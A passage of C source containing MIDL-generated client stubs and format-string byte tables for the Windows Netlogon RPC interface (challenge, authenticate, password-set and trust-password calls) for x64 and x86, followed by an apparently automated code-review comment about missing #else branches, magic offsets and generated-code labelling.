NTSTATUS NetrServerAuthenticate2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientCredential, OUT PNETLOGON_CREDENTIAL ServerCredential, IN OUT ULONG *NegotiateFlags)
{
return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[62], PrimaryName, AccountName, SecureChannelType, ComputerName, ClientCredential, ServerCredential, NegotiateFlags).Simple;
}
NTSTATUS NetrServerPasswordSet2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, IN PNL_TRUST_PASSWORD ClearNewPassword)
{
return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[142], PrimaryName, AccountName, SecureChannelType, ComputerName, Authenticator, ReturnAuthenticator, ClearNewPassword).Simple;
}
NTSTATUS NetrServerTrustPasswordsGet(IN LOGONSRV_HANDLE TrustedDcName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedNewOwfPassword, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedOldOwfPassword)
{
return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[222], TrustedDcName, AccountName, SecureChannelType, ComputerName, Authenticator, ReturnAuthenticator, EncryptedNewOwfPassword, EncryptedOldOwfPassword).Simple;
}
static const netlogon_MIDL_PROC_FORMAT_STRING netlogon__MIDL_ProcFormatString = {0, {
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x28, 0x00, 0x31, 0x08, 0x00, 0x00, 0x00, 0x5c, 0x3c, 0x00, 0x44, 0x00, 0x46, 0x05, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x08, 0x00, 0x0a, 0x01, 0x10, 0x00, 0x14, 0x00, 0x12, 0x21, 0x18, 0x00, 0x14, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x48,
0x00, 0x00, 0x00, 0x00, 0x0f, 0x00, 0x40, 0x00, 0x31, 0x08, 0x00, 0x00, 0x00, 0x5c, 0x5e, 0x00, 0x60, 0x00, 0x46, 0x08, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00,
0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x08, 0x00, 0x48, 0x00, 0x10, 0x00, 0x0d, 0x00, 0x0b, 0x01, 0x18, 0x00, 0x08, 0x00, 0x0a, 0x01, 0x20, 0x00, 0x14, 0x00, 0x12, 0x21, 0x28, 0x00,
0x14, 0x00, 0x58, 0x01, 0x30, 0x00, 0x08, 0x00, 0x70, 0x00, 0x38, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x1e, 0x00, 0x40, 0x00, 0x31, 0x08, 0x00, 0x00, 0x00, 0x5c, 0x8e, 0x02,
0x58, 0x00, 0x46, 0x08, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x08, 0x00, 0x48, 0x00, 0x10, 0x00, 0x0d, 0x00,
0x0b, 0x01, 0x18, 0x00, 0x08, 0x00, 0x0a, 0x01, 0x20, 0x00, 0x2a, 0x00, 0x12, 0x41, 0x28, 0x00, 0x2a, 0x00, 0x0a, 0x01, 0x30, 0x00, 0x42, 0x00, 0x70, 0x00, 0x38, 0x00, 0x08, 0x00, 0x00, 0x48,
0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x48, 0x00, 0x31, 0x08, 0x00, 0x00, 0x00, 0x5c, 0x56, 0x00, 0x40, 0x01, 0x46, 0x09, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00,
0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x08, 0x00, 0x48, 0x00, 0x10, 0x00, 0x0d, 0x00, 0x0b, 0x01, 0x18, 0x00, 0x08, 0x00, 0x0a, 0x01, 0x20, 0x00, 0x2a, 0x00, 0x12, 0x41, 0x28, 0x00,
0x2a, 0x00, 0x12, 0x41, 0x30, 0x00, 0x5a, 0x00, 0x12, 0x41, 0x38, 0x00, 0x5a, 0x00, 0x70, 0x00, 0x40, 0x00, 0x08, 0x00, 0x00,
}};
#elif defined(_M_IX86)
#pragma optimize("", off)
NTSTATUS NetrServerReqChallenge(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientChallenge, OUT PNETLOGON_CREDENTIAL ServerChallenge)
{
return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[0], (unsigned char *) &PrimaryName).Simple;
}
NTSTATUS NetrServerAuthenticate2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientCredential, OUT PNETLOGON_CREDENTIAL ServerCredential, IN OUT ULONG *NegotiateFlags)
{
return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[60], (unsigned char *) &PrimaryName).Simple;
}
NTSTATUS NetrServerPasswordSet2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, IN PNL_TRUST_PASSWORD ClearNewPassword)
{
return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[138], (unsigned char *) &PrimaryName).Simple;
}
NTSTATUS NetrServerTrustPasswordsGet(IN LOGONSRV_HANDLE TrustedDcName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedNewOwfPassword, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedOldOwfPassword)
{
return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[216], (unsigned char *) &TrustedDcName).Simple;
}
#pragma optimize("", on)
static const netlogon_MIDL_PROC_FORMAT_STRING netlogon__MIDL_ProcFormatString = {0, {
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x14, 0x00, 0x31, 0x04, 0x00, 0x00, 0x00, 0x5c, 0x3c, 0x00, 0x44, 0x00, 0x46, 0x05, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00,
0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x04, 0x00, 0x08, 0x00, 0x0a, 0x01, 0x08, 0x00, 0x14, 0x00, 0x12, 0x21, 0x0c, 0x00, 0x14, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00,
0x00, 0x00, 0x0f, 0x00, 0x20, 0x00, 0x31, 0x04, 0x00, 0x00, 0x00, 0x5c, 0x5e, 0x00, 0x60, 0x00, 0x46, 0x08, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00,
0x0b, 0x01, 0x04, 0x00, 0x08, 0x00, 0x48, 0x00, 0x08, 0x00, 0x0d, 0x00, 0x0b, 0x01, 0x0c, 0x00, 0x08, 0x00, 0x0a, 0x01, 0x10, 0x00, 0x14, 0x00, 0x12, 0x21, 0x14, 0x00, 0x14, 0x00, 0x58, 0x01,
0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x1c, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x1e, 0x00, 0x20, 0x00, 0x31, 0x04, 0x00, 0x00, 0x00, 0x5c, 0x8e, 0x02, 0x58, 0x00, 0x46, 0x08,
0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x04, 0x00, 0x08, 0x00, 0x48, 0x00, 0x08, 0x00, 0x0d, 0x00, 0x0b, 0x01, 0x0c, 0x00, 0x08, 0x00,
0x0a, 0x01, 0x10, 0x00, 0x2a, 0x00, 0x12, 0x41, 0x14, 0x00, 0x2a, 0x00, 0x0a, 0x01, 0x18, 0x00, 0x42, 0x00, 0x70, 0x00, 0x1c, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00,
0x24, 0x00, 0x31, 0x04, 0x00, 0x00, 0x00, 0x5c, 0x56, 0x00, 0x40, 0x01, 0x46, 0x09, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x04, 0x00,
0x08, 0x00, 0x48, 0x00, 0x08, 0x00, 0x0d, 0x00, 0x0b, 0x01, 0x0c, 0x00, 0x08, 0x00, 0x0a, 0x01, 0x10, 0x00, 0x2a, 0x00, 0x12, 0x41, 0x14, 0x00, 0x2a, 0x00, 0x12, 0x41, 0x18, 0x00, 0x5a, 0x00,
0x12, 0x41, 0x1c, 0x00, 0x5a, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00,
}};
#endif
static const netlogon_MIDL_TYPE_FORMAT_STRING netlogon__MIDL_TypeFormatString = {0, {
0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x11, 0x08, 0x25, 0x5c, 0x11, 0x00, 0x08, 0x00, 0x1d, 0x00, 0x08, 0x00, 0x02, 0x5b, 0x15, 0x00, 0x08, 0x00, 0x4c, 0x00, 0xf4, 0xff, 0x5c, 0x5b, 0x11, 0x04,
0xf4, 0xff, 0x11, 0x08, 0x08, 0x5c, 0x11, 0x00, 0x02, 0x00, 0x15, 0x03, 0x0c, 0x00, 0x4c, 0x00, 0xe4, 0xff, 0x08, 0x5b, 0x11, 0x04, 0xf4, 0xff, 0x11, 0x00, 0x08, 0x00, 0x1d, 0x01, 0x00, 0x02,
0x05, 0x5b, 0x15, 0x03, 0x04, 0x02, 0x4c, 0x00, 0xf4, 0xff, 0x08, 0x5b, 0x11, 0x04, 0x0c, 0x00, 0x1d, 0x00, 0x10, 0x00, 0x4c, 0x00, 0xbe, 0xff, 0x5c, 0x5b, 0x15, 0x00, 0x10, 0x00, 0x4c, 0x00,
0xf0, 0xff, 0x5c, 0x5b, 0x00,
}};
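Review bot: The `#if defined(_M_X64) || defined(_M_ARM64)` / `#elif defined(_M_IX86)` ladders at L419-L423 and L432-L492 have no `#else`, so on any other target `netlogon_MIDL_PROC_FORMAT_STRING` loses its `Format` member and the four stubs are silently not emitted, surfacing later as unrelated link errors; add `#else` / `#error "unsupported architecture for netlogon stubs"` / `#endif` to at least the struct's ladder. The proc-format offsets 0/62/142/222 (x64, L435-L447) and 0/60/138/216 (x86, L465-L477) are magic numbers that must stay in step with the byte tables at L449 and L480; a comment per stub naming the opnum its table entry starts with (`0x04`, `0x0f`, `0x1e`, `0x2a` are visible at the head of each entry) would make that coupling checkable. The `// TODO:ARM64` at L419 and L432 presumably means the ARM64 branch currently reuses the x64 table and the variadic `NdrClientCall2` form — worth stating explicitly so it is not mistaken for a verified port. The descriptor constants at L427 and L431 look MIDL-generated; a header comment saying so, and from which IDL, would tell the next maintainer not to hand-edit them.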